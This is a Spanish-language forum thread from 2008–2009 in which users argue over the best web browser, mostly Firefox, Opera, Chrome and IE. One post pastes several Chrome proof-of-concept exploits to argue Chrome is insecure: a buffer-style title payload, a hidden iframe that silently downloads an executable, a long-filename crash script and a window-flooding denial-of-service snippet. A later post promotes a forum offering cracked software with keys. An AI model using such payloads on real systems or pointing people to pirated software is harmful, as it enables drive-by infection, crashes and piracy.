PDA

Ver la Versión Completa : Mejor navegador



josefina ma
03-abr.-2008, 08:30
Hola Yo siempre he trabajado con internet explorer pero me han comentado que existen otros navegadores "mejores" ¿Cuál navegador me recomendarían, que sea seguro y su velocidad de busqueda sea mayor?:)

Keny
03-abr.-2008, 09:36
Sin dudarlo el mejor y es practicamente compatible con todo a parte de ser un sistema muy amigable... sin contar su infinidad de add ons para todo tipo de trabajo

MOZILLA FIREFOX... y es gratis...


opera es bueno pero me quedo con firefox...

Manjimaru
03-abr.-2008, 15:16
Mozilla Firefox es el mejor y como muy buena alternativa, también está Opera. Yo Internet Explorer no lo uso desde mayo de 2005 porque me topé con Firefox jejeje.

kchak79
04-abr.-2008, 01:21
Ya te respondieron digo lo mismo Firefox....
Boicott a Bill.....

Manjimaru
07-abr.-2008, 00:37
Pareciera que no tenes los plugs de Flash Player para Firefox. Deberias bajarlos cuando te aparece un aviso en la barra amarilla. Ahí mismo lo descargas y te sale que hay que reiniciar el navegador. Luego de eso, todo esta listo para ver aplicaciones hechas en flash para paginas web.

Manjimaru
07-abr.-2008, 01:06
Jejeje a mi jamás me ha dado problemas ningún plug para Firefox. Tenes algo de mala suerte jejeje.
Pero bueno, la cuestión está de que necesitas bajar el plug de flash player para Firefox y seguro lo has hecho. Cuando lo bajas, te baja un paquete que mide no más de 1 mega según me acuerdo. Luego le das doble click para instalarlo y te saldrá lo mismo que si estuvieras instalando algún programa. Pero un detalle a tener en cuenta es, que no hay que tener abierto el Firefox para ese proceso. Osea que no debes estar usando el navegador Firefox cuando estas instalando el plug que has bajado de la pagina de Adobe.
Al final de todo el proceso, según recuerdo, se te abrirá el Internet Explorer diciendo que todo está bien y que se ha instalado el plug. Ahora sólo bastaría que entraras con Firefox a una página web que tenga aplicaciones flash para probar.

UuUUmm y si usas Windows Vista... pero a pesar de eso, tampoco me ha dado problemas instalar plugs para Firefox en ese Windows.

Isildur
07-abr.-2008, 16:59
Solo dos palabras: Mozilla FireFox..... y yá.

pana
08-abr.-2008, 08:45
Todo el mundo esta encantado con el firefox de moccila, deberian de probar los grandes virtuosos, el safari y, dar su opinión al respecto. ¿Hace?

Manjimaru
08-abr.-2008, 19:57
Había un rumor de un Safari crackeado para la plataforma Windows. No le tome importancia indagar sobre el asunto pues ya me siento muy cómodo con Firefox.

Manjimaru
09-abr.-2008, 23:11
Estuve viendo hace un rato la web oficial y si veo que hay una versión para Windows. Por si la quieren probar está en -->>> descarga Safari 3.1 (http://www.apple.com/es/safari/download/). En lo que a mi respecta, estoy bien con Firefox jejeje.

FuMaRoLa
10-abr.-2008, 22:31
El mejor navegador y el que yo utilizo es Mozilla Firefox
sin duda el mejor ;)

Isildur
11-abr.-2008, 17:03
tratandose de móviles, es muy cómodo y recomendable usar Opera

marysolmoon
12-abr.-2008, 11:08
pienso que el mejor navegador es moxilla, al menos a mi
me a funcionado mas que el explorer

jasalvaru
11-oct.-2008, 13:58
tengo muchas dudas sobre internet y una de tantas es cual es el mejor navegador de internet para poder adquirir mas informacion que me puedaserde gran utilidad

kchak79
13-oct.-2008, 12:37
Firefox.....

Pixeled Soulja'
14-oct.-2008, 16:38
Definitivamente no es IE, los que yo uso son Opera y Firefox... :D

jl90
23-oct.-2008, 03:36
Safari brother

argel666
06-nov.-2008, 08:16
pues el mejor es firefox pero opera es muy bueno al = que ie

ne0hx
09-nov.-2008, 12:31
Definitivamente es Firefox.

caro_la_loca
11-nov.-2008, 06:48
El Google Chrome es muy bueno y anda rapidisimo :)

ne0hx
11-nov.-2008, 15:06
Ja ja ja no lo creo; mira alguna de las miles de vulnerabilidades que se han conseguido en este navegador, de google, si admito que es rapidisimo, pero no el mejor.

<html>
<head>
<!--
This file is saved as "Unicode" type because Chrome convert data (payload) to
"Unicode" while handling. This PoC Code execute a calculator.

Tested on Google Chrome (Language: Vietnamese) on Windows XP SP2.
Discoverer : Le Duc Anh - SVRT - Bkis

Mail : svrt[at]bkav.com.vn
-->

<title>
瓉瓉瓉瓉瓉
瓉瓉瓉瓉瓉
瓉瓉瓉瓉
瓉瓉瓉瓉[...]AAAAAA
</title>
<body>
</body>



// ----------------------------------------------------------------

Descarga el fichero automaticamente al ordenador del usuario aunque no disponga del el consentimiento del usuario.

<script>
document.write('<iframe src="http://www.example.com/helloworld.exe" frameborder="0"
width="0" height="0">');
</script>


http://milw0rm.com/sploits/2008-chrome.tgz


//-------------------------------------------------------------------

Google Silent Crash

<?php

/*
Google Chrome 0.2.149.27 (1583) Silent Crash PoC
WHK
*/

$nombre = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
...
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.psd';
$contenido = 'prueba';
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=$nombre");
print($contenido);

?>


//-------------------------------------------------------------------------

Una vez más el navegador desarrollado por Google, conocido como Google Chrome, presenta una vulnerabilidad facilmente explotable, esta vez se trata de Memory Exhaustation desde un servidor web remoto, provocando así una denegación de servicio.

Esta vulnerabilidad puede ser fácilmente explotada por un usuario malicioso que publique en su página web el siguiente código:


<script language=”javascript”>
window.open(”\r\n\r\n”);
window.refresh();
window.open(”\r\n\r\n”);
</script


//-------------------------------------------------------------------------

Asi podria pasar tecleando todas las vulnerabilidades que se an han conseguido, pero mejor solo dejo estas para que sepan que Google Chrome no es el mejor mavegador, en mi punto de vista no cambiaria Firefox por nada.


Saludos.

zaske87
13-nov.-2008, 14:41
♫ firefox y ya ♫

maxtorv
14-nov.-2008, 20:09
Usa lo que quieras menos IE...

Yo uso Firefox, lo que me gusta de el son los AddOns, son geniales, son como gadgets pero encuentras de todo!! Es como tener muchos programas en tu navegador.

LordSadic
16-nov.-2008, 11:41
Opera y Safari son los mejores

KraSh LC3
21-nov.-2008, 15:45
Opera, llevo 8 a&#241;os usandolo, y nada se le compara.

.-ef-.
25-nov.-2008, 03:06
firefox .. pero ie para nadaa :S

Johnny_5k
25-nov.-2008, 13:55
pues si , como ya todos lo han dicho , OPERA Y FIREFOX aunque en lo personal el que mas utilizo es FIREFOX


http://img374.imageshack.us/img374/5543/firefoxgx6.jpg (http://imageshack.us)

shun
02-dic.-2008, 05:55
Forefox y Google Chmore ,para mi son los mas rapidos y sencillos en utilizar

Sr. Machete
02-dic.-2008, 09:01
En mi opinión es Firefox

romeogerardo
02-dic.-2008, 16:10
safari definitivamente es el mejor

pepolini
02-dic.-2008, 16:17
Para mi, sin duda, no solo por sus complementos, sino porque da mucho menos porblemas ; FIREFOX

biohazardnet
25-dic.-2008, 21:49
firefox sin duda , esperando a google chrome

Ysmaay
26-dic.-2008, 14:59
Yo tengo Opera y creo que es el mejor. Mozilla tambien pero cuando lo usaba cada tres semanas me desaparec&#237;an las paginas marcadores...

DrahciR1987
08-ene.-2009, 08:59
yo prefiero el mozila !

kevin_6802
08-ene.-2009, 16:29
me falta mucho pero estoy iniciando

WazteR
08-ene.-2009, 16:55
Obvio que Internet Explorer &#191;?





Nah, el Opera es el que m&#225;s me gusta.

codecweb98
11-ene.-2009, 17:15
Como soy desarrollador web, tengo instalados en mi computadora los exploradores más populares: IE, FireFox, Safari, Chrome y Opera.

Tengo que usar tantos exploradores porque existe un gran problema: las páginas que diseño muchas veces se ven diferente en cada uno de ellos, y en ocasiones ciertos efectos o funciones no jalan en uno y en otro sí (por ejemplo: si tienes IE y FireFox instalados ve esta página (http://www.paginas-web-mexico.com.mx) en ambos y notaras que se ve diferente).

Aunque ciertamente considero a FireFox el más rápido, completo y eficiente de los exploradores, también tiene cosas que no me agradan, por ejemplo: no me gusta mucho como se ven ciertas imagenes con efectos de transparencia.

IE es pésimo, pues es que más problemas de compativilidad tiene. Las páginas se ven sumamente diferentes en IE 7 y en IE 6. Pero como, lamentablemente, es el que más personas usan pues generalmente hay que intentar hacer diseños que se adapten a IE.

Solo espero que más personas usen FireFox para Microsoft deje de pensar que es el "amo del internet" e IE sea verdaderamente compatible.

GeraLink
12-ene.-2009, 21:47
mozilla Firefox

elfutlomejor5
20-may.-2009, 15:54
google, mozila firefox

Edgar del Angel
20-may.-2009, 16:13
Sin duda el de Google, &#243;pera o IE, no se que le ven a la mediocridad llamada Firefox, es una basca, solo porque los de Google y otras p&#225;ginas lo han publicitado es que tiene tantos seguidores pero no deja de ser una de las peores marranadas en el mundo de la computaci&#243;n, solo equiparable con el Win ME y el Win Vista. &#161;el mejor hasta el momento es el de Google! pero el IE 8 est&#225; saliento muuuy bueno.l

Eddy-
20-may.-2009, 16:50
Fire
fox!!! ajuua!

Edgar del Angel
21-may.-2009, 10:05
Solo me gustar&#237;a que alguien (de los que les gusta la porquer&#237;a de Firefox) me explique que le ven de bueno, se traba bien feo y se tarda en arrancar mas que la fregada, adem&#225;s su navegaci&#243;n por pesta&#241;as est&#225; de hueva.

JohanaRoa
21-may.-2009, 10:07
Nada como google.......

Edgar del Angel
21-may.-2009, 10:13
&#161;de acuerdo! lo malo es que el Firefox est&#225; asociado con Google, &#161;que bueno que sali&#243; su navegador propio para ver si as&#237; desaparece la tarugada esa!

Malice
01-jun.-2009, 23:06
Pues, amm de los 4 navegadores que tengo en la compu puedo opionar de cada uno:

IE: Pues la nueva versión salió muy buena, lo malo es que amm solo para windows vista, ya lo he probado en xp y amm se traba mucho.

Mozilla Firefox: Opino lo mismo que edgar del angel, no se que le ven, o al menos a mi no me gusta, aunque bueno está más ligero que IE.

Safari: De mis favoritos, lo único que no me gusta es la chunche para agregar favoritos, de ahí en fuera safari es muy bueno.

Google Chrome: Tmb junto con safari de mis favoritos, es la mera onda, es ligero, y no me abre ventanas cada que abro una pagina, me abre pestañas, es lo que me choca de IE, que das click en otro vinculo y ¬¬ abre otra ventana y eso me choca, pero Google Chrome Rulez!!

En fin, mis favoritos son safari y google Chrome

Edgar del Angel
02-jun.-2009, 15:25
Pues, amm de los 4 navegadores que tengo en la compu puedo opionar de cada uno:

IE: Pues la nueva versión salió muy buena, lo malo es que amm solo para windows vista, ya lo he probado en xp y amm se traba mucho.

No se traba, yo lo tengo y en mi máquina jala chido.

Mozilla Firefox: Opino lo mismo que edgar del angel, no se que le ven, o al menos a mi no me gusta, aunque bueno está más ligero que IE.

Mas lijero pero mas pendejo, no tiene nada bueno, además de que luego se traba en el inicio.

Safari: De mis favoritos, lo único que no me gusta es la chunche para agregar favoritos, de ahí en fuera safari es muy bueno.

A mi se me hace bueno pero no para tenerlo.

Google Chrome: Tmb junto con safari de mis favoritos, es la mera onda, es ligero, y no me abre ventanas cada que abro una pagina, me abre pestañas, es lo que me choca de IE, que das click en otro vinculo y ¬¬ abre otra ventana y eso me choca,

Si lo configuras te habre pestañas.

pero Google Chrome Rulez!!

¡a fuerzaaaas! Google Chrome es la riata, junto con ópera. Te recomiendo que desinstales firefox y le metas Opera, verás como es la mera neta.

En fin, mis favoritos son safari y google Chrome

¡completamente de acuerdo con Google Chrome yea yea yea!

diego1995
08-jun.-2009, 09:42
para mi el mejor navegador es el internet explorer ya que es de facil manejo,seguro y rapido.

Z-kario
08-jun.-2009, 10:26
http://www.cattlegrid.info/images/get-firefox.jpg

navegador
08-jun.-2009, 12:38
Firefox 3

Es fácil de usar, seguro, de los más rapidos, y puedes descagar en cualquier lengua; no como IE el cual tiene que ser de la misma lengua que del sistema operativo; y lo más importante Firefox no es de Micro$oft.

Malice
08-jun.-2009, 15:37
pues es depende de cada quien, para algunos, es mejor firefox, para otros chrome y para otros explorer y as&#237;, a mi en lo personal firefox no me gusta para nada, no se, antes opinaba que era de lo mejor, pero despu&#233;s de un tiempo, amm termino por desilusionarme.

cada quien, habr&#225; quienes digan que chrome es una basura o safari no les gusta, pero son los dos que m&#225;s me gustan, y encuanto a explorer, la nuevaversi&#243;n, si no le sabes configurar a los complementos y eso, te va sacar canas verdes

Malice
12-jun.-2009, 01:59
nuevo safari 4, me gusto, más rápido, y lo de los sitios más visitados tmb me gusto, muy distinto a las otras versiones anteriores xD

observer
13-jun.-2009, 12:16
El firefox es la neta

observer
13-jun.-2009, 12:26
Pues el firefox sin duda

Malice
13-jun.-2009, 13:41
Safari y más con su nueva versión, me fascino, es más rápida xD

y sin duda Google Chrome xD

Maxima James
13-jun.-2009, 15:30
A mi parecer yo prefiero Opera, es muy bueno, rapido y confible, ademas trae muy buenos gadgets

ton1
24-jun.-2009, 17:39
FIREFOX es el mejor

sergio carlos ortiz
13-ago.-2009, 17:03
zafari aunque firefox tiene lo suyo

madara uchiha
14-ago.-2009, 21:38
pues yo uso el google chrome pero me gusta mas la zorra de fire fox :lol:

nadiale
02-sep.-2009, 11:26
pues yo uso el google chrome pero me gusta mas la zorra de fire fox :lol:

Si fire fox es un navegador mucho mas rapido y menos viruliento se recomienda bueno nadia y yo lo recomendamos:thumbup: Porque esta mas chido y mas tecnologico

israel11015
07-sep.-2009, 23:55
yo les recomiendo el crome o el opera son muy buenos

pero yo los invito a un nuevo foro donde les responderan todas sus preguntas
y les daran los links de descarga para bajar el programa que ocupen completo y con sus
claves de registro, o sea full completo

terrence
15-sep.-2009, 00:00
Yo la verdad es que no entiendo porque llamais porqueria al I.E. yo uso firefox y tambien opera y son buenos eso es cierto pero tambien uso I. E. 7 y la verdad me parece un navegador estupendo. Yo quisiera ver a opera y tambien a firefox ocupando más del 90% del mercado que pasaria con ellos. Si amigos I. E. es el navegador más atacado por mucho porque es el más usado ¿Que esperais entonces? No me parece justo que se le llame porqueria al I.E. yo lo digo Firefox y Opera son buenos muy buenos pero I.E. no es ninguna proqueria. Por otra parte seria conveniente ver las paginas que se visitan donde se cogen tantas porquerias. ¿Es culpa de I.E. o nuestra? visitar estas paginas. En cuanto a antivirus uso nord32 y me parece fabulos y en cuanto a firewall Outpost Pro con anty spy incorporado que junto con nord forman una defensa estupenda pero no les pidamos milagros si nos metemos en la boca del lobo no tengais duda alguna de que nos encontraremos con el lobo más tarde o más temprano pero nos lo encontraremos con las fauces bien abiertas. Feliz tarde para todo el mundo.

terrence
15-sep.-2009, 20:00
Recientemente se ha lanzado la versión freeware de Opera, ya que la anterior contenía Adware (una molestia). Surge entonces la pregunta de muchos ínter nautas (y por supuesto que me incluyo) en conocer ¿Cuál es el mejor navegador?.
Para saber cual es el mejor, mencionaré las características más resaltantes de ambos, su principal diferencia y sacaré una conclusión personal.
Firefox es un navegador de reciente data en comparación con Opera, pero tras él se encuentra toda la tecnología del que en un momento fue el mejor navegador de Internet (antes de Microsoft Internet Explorer), Netscape; y del navegador que lleva el nombre de la fundación que lo desarrolla, Mozilla.
Con estos antecedentes, Firefox entró al mercado virtual con pompas y platillos. En la actualidad, su popularidad lo tiene en la cima (junto a IE).
Opera por el contrario, es un navegador con más años (o tradición) pero que no ha recibido mucha atención, probablemente por la pesada publicidad que tenía. Como lo mencione líneas arriba, ahora esto ha cambiado.
Considero que las principales características de Firefox son su navegación por pestañas, la enorme cantidad de extensiones que cuenta, su bloqueo de ventanas emergentes (popups) y sus marcadores vivos.
Si todavía no haz usado Firefox, no has experimentado la tremenda comodidad que proporcionan sus pestañas, esta es tal ves su mejor característica. Aunque… Opera también cuenta con navegación por pestañas, es más ellos la inventaron.
Sin embargo, con lo que no cuenta Opera, es con la enorme cantidad de extensiones que tiene Firefox, lo que lo hace realmente personalizable. Y si bien Opera también permite la personalización del navegador, no se compara con Firefox.
Muy bien, no quiero parcializarme. Opera también tiene lo suyo:
•En velocidad, creo que Opera lleva la ventaja.
•No recarga la página, cuanto uno retrocede.
•La ya mencionada navegación por pestañas
•Cuenta con un cliente IRC (para Chat) interno.
•Posibilidad de personalizar las hojas de estilo
•Sistema de descarga.
•Cliente de correo electrónico interno
•Lector de noticias interno
Y muchas y muy buenas características más, pero que felizmente Firefox también tiene mediante sus extensiones. Y esta es, a mi parecer, la gran diferencia, porque para muchos de nosotros no es necesario utilizar todas las funciones, el uso de cada cual depende de la necesidad y preferencias de cada usuario.
En conclusión, pienso que ambos navegadores son recomendables. Pero si tuviera que decidirme por uno, Firefox es el mejor. Precisamente, por la facultad de cada uno de personalizar al navegador… Tal vez, cuando Opera brinde esta facultad, mediante el uso de plugins, extensiones o algún otro sistema, cambie de opinión.

AzaelBR
16-sep.-2009, 16:38
Primero no tenemos que apantallarnos con el skin del explorador por que por lo regular es una muestra de que ha de tener un error. Casi cualquier navegador que no sea IE te proporcionará mayor seguridad y mejores prestaciones, algunos de los más indicados son:
- Mozilla Firefox
- Opera

a y tambien les recomiendo el Nod32 4.0

Saludos.

mauro.
16-sep.-2009, 20:21
El Google Chrome

agugt40
16-sep.-2009, 23:57
Firefox y Chrome
Firefox por la solides y Chrome por la comodidad.

terrence
17-sep.-2009, 22:33
hola gente,
gracias por las respuestas,
si existen algunos otros buenos navegadores ademas de los tres mas populares, chrome, firefox y opera?
saludos.

tortugo gabriel
18-sep.-2009, 07:54
uso google crome ...

pinguimaru
19-sep.-2009, 11:30
recomiendo el firefox por su versatilidad y gran capacidad de personalizar y usar complementos...
http://pinguimaru.mybrute.com

Szyslak
19-sep.-2009, 15:42
El Chrome es el mas rapido (esta comprobado), pero, si tienes un Mac el Safari supera al Chrome

DarkWarlock86
28-sep.-2009, 07:00
Puede que FireFox sea mejor... como dicen muchos. Pero yo siempre he usado y todavia sigo usando Internet Explorer, mas que todo por costumbre. No he podido acostumbrarme ni al FireFox ni al Chrome, asi que siempre que he intentado usar cualquiera de los dos, siempre termino volviendo al Internet Explorer.

oscar_0294
29-sep.-2009, 14:07
Mira pues para mi el navegador
mas rapido seria el firefox y pues
tambn el internet explorer es
muy rapido.

Szyslak
30-sep.-2009, 08:53
Mira pues para mi el navegador
mas rapido seria el firefox y pues
tambn el internet explorer es
muy rapido.

jjajajajjajajjajaj

ambrosia2000
01-oct.-2009, 07:43
A mi me gusta mucho el mozilla, guarda contraseñas
y no me saca de juegos .
ojala te sirva
mi nombre es anai y estoy en un curso de computacion , y esta es parte de una practica.
suerte y cuidate mucho !!!:thumbup1:

lalo0225
03-oct.-2009, 16:41
Pues para mi el mejor navegador es el mozilla porque
los archivos se descargan muy rapido, pero tambien hay otros navegadores
que tambien son rapidos como el opera.

profeinfo
21-oct.-2009, 23:53
creo que por costumbre solo uso internet explorer, bueno y por comodidad por que ya le entiendo a este

arock_arock
22-oct.-2009, 11:57
Otro buen navegador pero es para MAC y apple es Safari

29-oct.-2009, 21:42
hvjgvjjhbjhbkjbhkhbk cyfcuygljbl c ugho

29-oct.-2009, 21:44
pues yo uso dos navegadores uno es el INTERNET EXPLORER Y EL NESTCAPE

selene rubi corral gil
03-nov.-2009, 21:46
para mi el mejor buscador es el google por su fasilidad este es un trabajo de mi escuela pero me parece qrue esta es muy buena pagina.
selene rubi corral gil grupo: 1-h N.L: 13

letsgoculiacan
04-nov.-2009, 03:16
Google Chrome

Titanic
07-nov.-2009, 05:10
Firefox y Opera utilizo ambos:wink:

TheBerzerker
07-nov.-2009, 09:14
Me encanta el zorro mozilla !!

historiasdemaria
07-nov.-2009, 12:25
Mozilla Firefox ;)

saul muñoz
09-nov.-2009, 16:17
qu te mporta

sandra de la torre
10-nov.-2009, 08:40
yo uso internet explorer

rosa navarro meza
10-nov.-2009, 08:40
yo uso internet explorer

ceci cecilia
10-nov.-2009, 08:41
yo uso internet explore

TE KIERO
10-nov.-2009, 08:41
Yo uso internet explorer

Craz
10-nov.-2009, 08:41
yo uo internet eplorer

el soñador
10-nov.-2009, 08:41
yo uso internet exploren

AMIGAS X SINPRE
10-nov.-2009, 08:41
Yo uso internet exploret

TE KIERO
10-nov.-2009, 08:46
yo uso internet explore


tonto soñador

rosa navarro meza
10-nov.-2009, 08:46
yo uso internet explorer
hola has comprendido como se usa el foro:001_tt1::001_tt1::001_tt1:

Craz
10-nov.-2009, 08:48
Yo tambien uso Internet

AMIGAS X SINPRE
10-nov.-2009, 08:49
yo uso internet exploren

OLA COMO ESTAS COMO TE LLAMAS :confused1:

TE KIERO
10-nov.-2009, 08:50
:thumbup1:IO

el soñador
10-nov.-2009, 08:50
yo tam bien uso internet exexploren si gue usaandolo wee

TE KIERO
10-nov.-2009, 08:51
Hola komo te iamas

Juan E
16-nov.-2009, 10:59
Además de IE, probe Opera, Safari Chrome y Firefox, y definitivamente me quedo con este último, rápido, seguro y con mil pluggins disponibles.

PD
Entre todos los plugins recomiendo FoxMarks, que te permite sincronizar tus favoritos en todas las máquinas dónde tengas instalado el Firefox.

Cynthia Citlally Alvarado
18-nov.-2009, 18:15
Hola, oigan a todos ayudenme porfavor necesito hablar sobre TIC asi rapidito es para una tarea, me ayudan?